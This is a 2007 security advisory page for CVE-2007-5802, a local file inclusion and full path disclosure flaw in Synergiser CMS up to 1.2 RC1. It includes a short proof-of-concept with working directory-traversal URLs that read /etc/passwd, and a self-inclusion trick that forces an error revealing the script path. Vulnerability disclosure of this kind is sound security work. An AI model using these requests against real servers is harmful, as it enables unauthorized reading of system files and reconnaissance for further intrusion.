Synergiser <= 1.2 RC1 Local File Inclusion & Full path disclosure

2007-11-03 / 2007-11-04
Credit: KiNgOfThEwOrLd
Risk: Medium
Local: No
Remote: Yes
CVE: CVE-2007-5802
CWE: CWE-22


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

--------------------------------------------------------------- ____ __________ __ ____ __ /_ | ____ |__\_____ \ _____/ |_ /_ |/ |_ | |/ \ | | _(__ <_/ ___\ __\ ______ | \ __ | | | \ | |/ \ \___| | /_____/ | || | |___|___| /\__| /______ /\___ >__| |___||__| \/\______| \/ \/ --------------------------------------------------------------- Http://www.inj3ct-it.org Staff[at]inj3ct-it[dot]org Original here: http://www.inj3ct-it.org/exploit/syner.txt --------------------------------------------------------------- Synergiser <= 1.2 RC1 Local File Inclusion & Full path disclosure --------------------------------------------------------------- #By KiNgOfThEwOrLd --------------------------------------------------------------- PoC: --------------------------------------------------------------- Synergiser cms allows to include a file by the get variabile "page". We can't include a remote file, coz there is a filter..but we can include, by a directory traversal, some important files...for example: --------------------------------------------------------------- http://[target]/[synergiser_path]/index.php?page=../../../etc/passwd --------------------------------------------------------------- So, we have to know the script path if we wanna browse the server...we can get it generating a full path disclosure, like this: --------------------------------------------------------------- http://[target]/[synergiser_path]/index.php?page=../index.php --------------------------------------------------------------- We know that a function cannot be declared two times. So, let's read the "index.php" code, and we will found: --------------------------------------------------------------- include('application_top.php'); --------------------------------------------------------------- This row includes "application_top.php". In that page, is declared a php function: assign_rand_value(); So, including index.php in index.php, we will reinclude application_top.php, and we will redeclare the same function. We can't do it! So the server will answer: --------------------------------------------------------------- Fatal error: Cannot redeclare assign_rand_value() (previously declared in [script_path]/application_top.php:9) in [script_path]/application_top.php on line 124 --------------------------------------------------------------- And we got the script path! :P ---------------------------------------------------------------


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top